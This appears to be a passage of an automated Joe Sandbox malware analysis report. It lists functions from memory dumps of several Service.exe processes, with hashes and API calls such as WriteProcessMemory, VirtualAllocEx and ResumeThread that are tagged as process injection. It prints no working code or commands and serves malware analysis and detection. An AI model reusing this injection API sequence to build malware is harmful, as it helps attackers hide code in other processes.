Function 02DE4E40 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02DE5011

Memory Dump Source

Source File: 00000017.00000002.2404007710.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2de0000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 30132315eec709143f5bd9b4ea5bcf2b02a756808c2bf19a7f796b8a9e3f647a
Instruction ID: 7938f32d5e239c13e44ea21382490e054c72d8c71164bea5d3157924dc6a01da
Opcode Fuzzy Hash: 30132315eec709143f5bd9b4ea5bcf2b02a756808c2bf19a7f796b8a9e3f647a
Instruction Fuzzy Hash: 7981C2B4D002598FDF20DFA9D840BDDBBF5BB09304F1090AAE509B7250DB70AA89DF55

Function 02DE5C78 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02DE5E49

Memory Dump Source

Source File: 00000017.00000002.2404007710.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2de0000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: ffbd99982c7086405f4b53a96a81432875786fca25adab98912aea64258e0b49
Instruction ID: b4bc07843e1b999f3b766395d4e56379d5b0272eb9917e9e41000c5fd4d35ac8
Opcode Fuzzy Hash: ffbd99982c7086405f4b53a96a81432875786fca25adab98912aea64258e0b49
Instruction Fuzzy Hash: D681C2B4D00219DFDF21DFA9D884BDDBBF5AB09304F1090AAE509B7260DB709A85CF55

Function 02DE21F0 Relevance: 1.6, APIs: 1, Instructions: 113injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02DE22C6

Memory Dump Source

Source File: 00000017.00000002.2404007710.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2de0000_Service.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 42e6150494e7e58de794fb9e7d9ebe999353042ea9a38383a944a8b9bbf8240d
Instruction ID: 40d16c5a6a17b6d8639cfa6d24e16bd3c91e97e1d74a8f6f8d6ed10bdff2a00e
Opcode Fuzzy Hash: 42e6150494e7e58de794fb9e7d9ebe999353042ea9a38383a944a8b9bbf8240d
Instruction Fuzzy Hash: 804176B5D042589FCF00CFA9D984AAEFBF5BB49314F24902AE818B7250D335AA45CB64

Function 02DE21F8 Relevance: 1.6, APIs: 1, Instructions: 110injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02DE22C6

Memory Dump Source

Source File: 00000017.00000002.2404007710.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2de0000_Service.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 1a5b5db0ea88301cf862ee1e74e8ff30f80f6eb7c4b6461aa7b52daa5e55f425
Instruction ID: 4d5b0878053a811a479156fabb48abcd876ae24df89baa0ff6da41c25d4f205a
Opcode Fuzzy Hash: 1a5b5db0ea88301cf862ee1e74e8ff30f80f6eb7c4b6461aa7b52daa5e55f425
Instruction Fuzzy Hash: 274165B5D002589FCF10CFA9D984ADEFBF5BB49314F24902AE819B7310D375AA45CB64

Function 02DE1FD0 Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02DE2085

Memory Dump Source

Source File: 00000017.00000002.2404007710.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2de0000_Service.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4721ebc9866799f038759051c44f342ff44fba0f58283734914a53acca8f380c
Instruction ID: e5fc9756d1bae0f84850234e8fc1e36cc4d55f9c27ddbb516865b7faa6d4853b
Opcode Fuzzy Hash: 4721ebc9866799f038759051c44f342ff44fba0f58283734914a53acca8f380c
Instruction Fuzzy Hash: 904187B9D042589FCF10CFAAD984ADEFBB5BB19310F20902AE818B7310D335A945CF65

Function 02DE20E8 Relevance: 1.6, APIs: 1, Instructions: 100memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02DE2195

Memory Dump Source

Source File: 00000017.00000002.2404007710.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2de0000_Service.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5a292b791ff033dd915f362aa7c435a503744318c8d5732750d4414f50d190fb
Instruction ID: 0e1b7b99b3a691e101c7df62a017c0f7ea4f12922c0192dc7e399f195b7aa5ff
Opcode Fuzzy Hash: 5a292b791ff033dd915f362aa7c435a503744318c8d5732750d4414f50d190fb
Instruction Fuzzy Hash: E83167B9D042589FCF10CFA9D984ADEFBF5AB09310F10902AE918B7310D335A946CF65

Function 02DE1FD8 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02DE2085

Memory Dump Source

Source File: 00000017.00000002.2404007710.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2de0000_Service.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 8da09841fb09089e21c1908cd5faf935694748a7a1a166b5e201564261839384
Instruction ID: 804c04743627f951a8277c37bac3cc4ada4f14de8a46e5b8f684cb620dfb0c33
Opcode Fuzzy Hash: 8da09841fb09089e21c1908cd5faf935694748a7a1a166b5e201564261839384
Instruction Fuzzy Hash: A43176B9D042589FCF10CFAAD984ADEFBB5BB19310F10A02AE819B7350D335A945CF64

Function 02DE20F0 Relevance: 1.6, APIs: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02DE2195

Memory Dump Source

Source File: 00000017.00000002.2404007710.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2de0000_Service.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 778b3774ac79b04b025f758321032ddfbaab3c899553781854f797c5e860eb59
Instruction ID: 6f62f2d086c6ba540aa5e350b5d1e3c9616f65f12617423519ba75081a7a68f2
Opcode Fuzzy Hash: 778b3774ac79b04b025f758321032ddfbaab3c899553781854f797c5e860eb59
Instruction Fuzzy Hash: 1D3154B9D042589FCF10CFA9D984A9EFBB5BB19310F10A02AE919B7310D335A945CF65

Function 02DE1EC1 Relevance: 1.6, APIs: 1, Instructions: 89threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 02DE1F72

Memory Dump Source

Source File: 00000017.00000002.2404007710.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2de0000_Service.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: e75a5430d4d36db8f013a2d53205a55678c35906d74dcba662a014810f898967
Instruction ID: 5dbb47f33f009a11ba9b74651e0fc5bb8857e20a7d336cf97f49837db8f43e95
Opcode Fuzzy Hash: e75a5430d4d36db8f013a2d53205a55678c35906d74dcba662a014810f898967
Instruction Fuzzy Hash: E631B9B5D012589FCB10CFA9D584ADEFBF1BB49314F24806AE418B7350D3789949CFA4

Function 02DE1EC8 Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 02DE1F72

Memory Dump Source

Source File: 00000017.00000002.2404007710.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2de0000_Service.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 3e744d0c26d80ab8d9f06f565026e78a0b7963e69728c8b4cecacccd20bcdf90
Instruction ID: 474bfb89af397006b39936384475348b61b866232dd71b1cb6bbeae520116c17
Opcode Fuzzy Hash: 3e744d0c26d80ab8d9f06f565026e78a0b7963e69728c8b4cecacccd20bcdf90
Instruction Fuzzy Hash: 0A31A9B5D012589FCB10CFAAD984ADEFBF1BB49314F24802AE419B7350C338A945CFA4

Function 02DE2331 Relevance: 1.6, APIs: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 02DE23AE

Memory Dump Source

Source File: 00000017.00000002.2404007710.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2de0000_Service.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 80dd2be6e3a6e99a9c0b2642cf4f16b13d325d7c917e06c0476ca8d1895a9c06
Instruction ID: 61bd9496b45799696ff14abf742b4fe9cd65c6a648d661ad1c63979b98b139a3
Opcode Fuzzy Hash: 80dd2be6e3a6e99a9c0b2642cf4f16b13d325d7c917e06c0476ca8d1895a9c06
Instruction Fuzzy Hash: 1F21ACB4D042199FCB10CFA9D884ADEFBF4AB49324F14905AE815B7310D375A945CFA5

Function 02DE2338 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 02DE23AE

Memory Dump Source

Source File: 00000017.00000002.2404007710.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2de0000_Service.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e28e7d89dec54ce6814eaabd86583c6bda15e1c5557667bd8462f91deae005c4
Instruction ID: aa2e82ad94ffa434be33ad3384c682fd6f7521d3235adb7a71ccfacb00a48075
Opcode Fuzzy Hash: e28e7d89dec54ce6814eaabd86583c6bda15e1c5557667bd8462f91deae005c4
Instruction Fuzzy Hash: 2A21A8B8D002189FCB10CFA9D884ADEFBF4AB09324F20905AE819B3310C335A945CFA4

Analysis Process: Service.exePID: 1856, Parent PID: 6984COMMON

Executed Functions

Function 009F0ECB Relevance: 4.0, Strings: 3, Instructions: 295COMMON

Download Yara Rule

Strings

$]q, xrefs: 009F0EE6
Xaq, xrefs: 009F0EFF
Ij, xrefs: 009F113A

Memory Dump Source

Source File: 00000018.00000002.2431409114.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9f0000_Service.jbxd

Similarity

API ID:
String ID: Xaq$$]q$Ij
API String ID: 0-3366223111
Opcode ID: dd4af41f6226ee06e99d447b3bea2c5a9f55bbe61a924e3dd69f29597dda5b2f
Instruction ID: d55a316b1de83a6914167b36ee471a2be82be859367ae664e211512b8cd944bd
Opcode Fuzzy Hash: dd4af41f6226ee06e99d447b3bea2c5a9f55bbe61a924e3dd69f29597dda5b2f
Instruction Fuzzy Hash: A4A18034B18218DFCB489F78985467E7BB7FFC8710B14896AE506E7394DE389C029B91

Function 009F0901 Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

Haq, xrefs: 009F095D

Memory Dump Source

Source File: 00000018.00000002.2431409114.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9f0000_Service.jbxd

Similarity

API ID:
String ID: Haq
API String ID: 0-725504367
Opcode ID: 7a4a71ee458332cc78f811cf7400cbc46eb6ff4dc5db3bb5cce5866b0b4e8002
Instruction ID: ec52c6ab0dc3305a77bf438da90df9c143d2ecd51d278d0059aa0b051886a7c8
Opcode Fuzzy Hash: 7a4a71ee458332cc78f811cf7400cbc46eb6ff4dc5db3bb5cce5866b0b4e8002
Instruction Fuzzy Hash: 2F219230E05209CFCB54EFB8C4557AEBBF1AB84300F1084B9C509AB396EB748E45CB90

Function 009F1304 Relevance: .5, Instructions: 495COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2431409114.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9f0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a5119d80a3390a4bee5f28f189acaddc87f535c902b1c0d431ccb4c51e68e05
Instruction ID: 11e81dc7ec237fffcd0f40f8e36f9916970e943de1acbbdbc325d4f10ae2f7e9
Opcode Fuzzy Hash: 3a5119d80a3390a4bee5f28f189acaddc87f535c902b1c0d431ccb4c51e68e05
Instruction Fuzzy Hash: 7331B17490024ADFCB51EFB8D844AAD7BF2FF85300F6089A9E005BB355DB745A90CB91

Function 009F0BD8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2431409114.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9f0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ad313b4bdd383f4cf8fc3e34b487637f42eafde2e6587b0fc1707380fdf91a0
Instruction ID: a666cfaa2691a23c3e9219d0c8b889d7c7bc350b02deba0feeb899984ea61ca0
Opcode Fuzzy Hash: 0ad313b4bdd383f4cf8fc3e34b487637f42eafde2e6587b0fc1707380fdf91a0
Instruction Fuzzy Hash: CA71B4757002068FCB55EF78D85862E7BF2FFC8300B608968E51AAB7A5DF349C419B81

Function 009F0BCB Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2431409114.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9f0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b1de7efde943ed42ce92eb8e62bf9f5944a2b71e025ece9a204c74700dd273
Instruction ID: a0fed5f29c5f06edb84ce495d66eb081564dfd13e8893ac8dac71baa63c7ec0a
Opcode Fuzzy Hash: 16b1de7efde943ed42ce92eb8e62bf9f5944a2b71e025ece9a204c74700dd273
Instruction Fuzzy Hash: 9C4184756142068FCB59EF78D85866EBBF2FF84304320892CE41AAB795DF389C459BC1

Function 009F1771 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2431409114.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9f0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37496cceb01fdbd5e56a3471374c8f119410f4578917e8bb9cf5459099053616
Instruction ID: 0b473cde3b5c78075681478f4a219714bff8539fe06732a946953c3ca6337f17
Opcode Fuzzy Hash: 37496cceb01fdbd5e56a3471374c8f119410f4578917e8bb9cf5459099053616
Instruction Fuzzy Hash: 802196B5B002159FCB48AFBD485436EBAEAEFC8340B15883DD55ED7391DE348D0187A1

Function 009F1660 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2431409114.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9f0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36182924ad70cefcd7fd14cac5c4911f2d29355ef52ead25d1c93c4050811cc5
Instruction ID: 5ac36d721253d34f66e9f8afeb81265aec74d505fede1389a0babad860c374e3
Opcode Fuzzy Hash: 36182924ad70cefcd7fd14cac5c4911f2d29355ef52ead25d1c93c4050811cc5
Instruction Fuzzy Hash: D6217E7490020ADFCB45EFB8D844AAD7BB6FF84300F608969E405BB354DB746A91CB91

Function 009F0CC2 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2431409114.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9f0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58d6ad0a4b5256a598fdaf868bb1e656d78fb118e3815bbac586a1ab645ffb23
Instruction ID: 0db1d2a5e840ab4446c5b7080521988376e851e73ae1729c4b09edea88dc40f2
Opcode Fuzzy Hash: 58d6ad0a4b5256a598fdaf868bb1e656d78fb118e3815bbac586a1ab645ffb23
Instruction Fuzzy Hash: 3C216F72700B064BCB2AAB7D845812EBAE6FFC42143108D2CD16A8B790DF35ED059BC2

Function 009F0838 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2431409114.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9f0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 792b8eff88cedfd501bcd36bb7fd9522052ea3f841ba3af391d4218f2a769b4c
Instruction ID: e813e97d87a9adb3bd67cc55f94d437fd629b590090a8f15c49e26ae949ee72f
Opcode Fuzzy Hash: 792b8eff88cedfd501bcd36bb7fd9522052ea3f841ba3af391d4218f2a769b4c
Instruction Fuzzy Hash: EB11EC741011478FCBA2EF78F880E5977F2EB64304BA09E54E408BF229D6B85995CF80

Function 009F0848 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2431409114.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_9f0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2979bef3c9275b2ca4b91c3ad7cbc8f5dd94802fd95e93c0f4b27e68c33505db
Instruction ID: c30dcf7e02a4e4e91344bd89fde7f7903b7b6108a1c2a5bd9c1df39b0a80a95b
Opcode Fuzzy Hash: 2979bef3c9275b2ca4b91c3ad7cbc8f5dd94802fd95e93c0f4b27e68c33505db
Instruction Fuzzy Hash: 9B01DE741111079FCBA1FF68F880E5537F6F764304BA08E54B408BF229D6B86995DF80

Analysis Process: Service.exePID: 5348, Parent PID: 6984COMMON

Executed Functions

Function 02CD1304 Relevance: .5, Instructions: 497COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2434930388.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_2cd0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7109553b21fd23ff50c1f15b311b164763c2b34a7fb36b67180c17dc55e3341d
Instruction ID: 7a14f1263a93ea87e19ce201d6f4a4f70a30cad60422971c19c16bf8b6c9ff52
Opcode Fuzzy Hash: 7109553b21fd23ff50c1f15b311b164763c2b34a7fb36b67180c17dc55e3341d
Instruction Fuzzy Hash: FD31A07490021ADFCF01EFB9D85469EBBB6FF85300F204AA9D105A7355DB306991CF51

Function 02CD0BD8 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2434930388.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_2cd0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 585a503e82bde3423a61ecf65b9e0616ed1ed7bd0ebd087f1baebb4db017b270
Instruction ID: 5d11a23486419d2c28207341b4c04e9b4aff3c41da3923e2fe4ee623a98d260c
Opcode Fuzzy Hash: 585a503e82bde3423a61ecf65b9e0616ed1ed7bd0ebd087f1baebb4db017b270
Instruction Fuzzy Hash: 9071B471B001068FCB19EF79E85866E7BE7FF88704B208969E406DB795EF309C158B81

Function 02CD0BC8 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2434930388.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_2cd0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17354009519f754302b8cfecf386185af2de484aa3207747aa18bc91e8410349
Instruction ID: ea2310a2abd3ea8b33d25ffe218a80379542f9a3d9c95cae9542cdb41f7729d4
Opcode Fuzzy Hash: 17354009519f754302b8cfecf386185af2de484aa3207747aa18bc91e8410349
Instruction Fuzzy Hash: 9D419471A012128FCF19EF79E4686AEBBA7FB847447204E2DE406C7644EF349C558F81

Function 02CD1771 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2434930388.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_2cd0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e393d4b640e571b8b440808d24da80c745f97b957a7fcc252c40c49ebdf64475
Instruction ID: d4a3a1d38c01104685634e78333aeb98b6b479c89ac7f813589a3391330b66c1
Opcode Fuzzy Hash: e393d4b640e571b8b440808d24da80c745f97b957a7fcc252c40c49ebdf64475
Instruction Fuzzy Hash: 00218471B002165FCB08AFBD58543AEB9DBEFC8750B25886DD54AD7381DE34884187A2

Function 02CD1660 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2434930388.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_2cd0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e908dbed8cc6b9898186e53b79925609d10232087ba580f04aede8d347f56e39
Instruction ID: c243ac98ef89ae9d577ea3fec0cc0ce811a8f4fe37c332938eccdc10df6b250a
Opcode Fuzzy Hash: e908dbed8cc6b9898186e53b79925609d10232087ba580f04aede8d347f56e39
Instruction Fuzzy Hash: DA215C7490021ADFCF05EFB9D8446ADBBB6FF84304F204A69E505A7344DB706A91CF91

Function 02CD0CC2 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2434930388.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_2cd0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b57a22b32ab273418a311ec85eb2c13d015b782ed818c49f5b6d92f84aa59d55
Instruction ID: 6687560723b4cdc92bd809b94a7a19b4b006fd8b06ed59c0198f500f4a5d39b2
Opcode Fuzzy Hash: b57a22b32ab273418a311ec85eb2c13d015b782ed818c49f5b6d92f84aa59d55
Instruction Fuzzy Hash: 9B218172B00A024BCB1DAB7D941816E7AE7FFC42543148D6DD56ACB680EF34DC198BC2

Function 02CD0838 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2434930388.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_2cd0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31ee952664e23f3f2d250b4b329d408a25f238b2b9f6d902be1135058feb677a
Instruction ID: 95eb4331bdab2883d02fa87993df68e438a0c591f3c96eb485c1bc479864c4ce
Opcode Fuzzy Hash: 31ee952664e23f3f2d250b4b329d408a25f238b2b9f6d902be1135058feb677a
Instruction Fuzzy Hash: 0811CCB4501167CFCF02EF6AFD81A457BA7FB44704B248F64A5049B21DE6747A55CF80

Function 02CD0848 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2434930388.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_2cd0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60e436bc146d7fe7718df5d718a19c0f3de01b63343bb4bd82dd3e1a10607661
Instruction ID: f661bf2412d02e882b340b0fe10c43cafd13b982acf0be5691dd6f7e8ff62127
Opcode Fuzzy Hash: 60e436bc146d7fe7718df5d718a19c0f3de01b63343bb4bd82dd3e1a10607661
Instruction Fuzzy Hash: 1C0197B460122B9FCF02FF6AFD80A597BB6F744704B209F54B5088B21DE6747A958F80

Function 02CD0901 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2434930388.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_2cd0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f8f81e8253d773b340ce2d17d6c0cb8630c25e84b616987b785e7f1311fafb
Instruction ID: cfae9792b4114cb2b248f120a5b86421921c89fe3d90659026ba36726175cf9e
Opcode Fuzzy Hash: f5f8f81e8253d773b340ce2d17d6c0cb8630c25e84b616987b785e7f1311fafb
Instruction Fuzzy Hash: A9D0A736A05204C7CB05AB78F65D3183F529F4130AF0844BCDD09CB252F6358D38CB80

Analysis Process: Service.exePID: 6284, Parent PID: 6984COMMON

Executed Functions

Function 01350901 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

Haq, xrefs: 0135095D

Memory Dump Source

Source File: 0000001A.00000002.2434539077.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_1350000_Service.jbxd

Similarity

API ID:
String ID: Haq
API String ID: 0-725504367
Opcode ID: 250cd4fa7564dbfc3ba76ae3683bcf161697381c115fb7bddea48a1602a584ee
Instruction ID: 4a28390bb5d64cd8c31327a3d8a925fef2264fe39f1e898e4833971c8954ec8c
Opcode Fuzzy Hash: 250cd4fa7564dbfc3ba76ae3683bcf161697381c115fb7bddea48a1602a584ee
Instruction Fuzzy Hash: 3B21D070E052098FCB88EFB8C4546AD7FF1AF85300F1144AAD888DB295EB359E42CB81

Function 01351304 Relevance: .5, Instructions: 498COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2434539077.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_1350000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3b9a294e4dac30fb13517d2e35cea2c7d072fabb907fca1274aeb7aa8537c51
Instruction ID: e682588d5385e6547e4d94e58e7546d9bc6ceb723875bbb98bd0dbe5223c88ef
Opcode Fuzzy Hash: a3b9a294e4dac30fb13517d2e35cea2c7d072fabb907fca1274aeb7aa8537c51
Instruction Fuzzy Hash: EB31B17491034ADFCF01EFB8D844AAD7BB2FF84304F208A6AE405A7355DB386952CB51

Function 01350BD8 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2434539077.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_1350000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe90f7ed1a6687038f917c9af9cb753fd69ffd85c22a2bf8c6b8412f13212bfc
Instruction ID: 24f858d39bc0ee117e937bc91bad0fb2db01077fdde175f64fff7153617f4224
Opcode Fuzzy Hash: fe90f7ed1a6687038f917c9af9cb753fd69ffd85c22a2bf8c6b8412f13212bfc
Instruction Fuzzy Hash: 8E71B5747002068FCB19EB79D598A6E7BE7FF84700B108968E446DB795DF399C068B81

Function 01350BC8 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2434539077.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_1350000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c53bfef1bdd53c7027df9b8b03622181668549130f543982f7f566ecb9e52ce
Instruction ID: 20bab2683334a636b82bc1c24ff24ae7c9098202dd056bb69a5601bf25093899
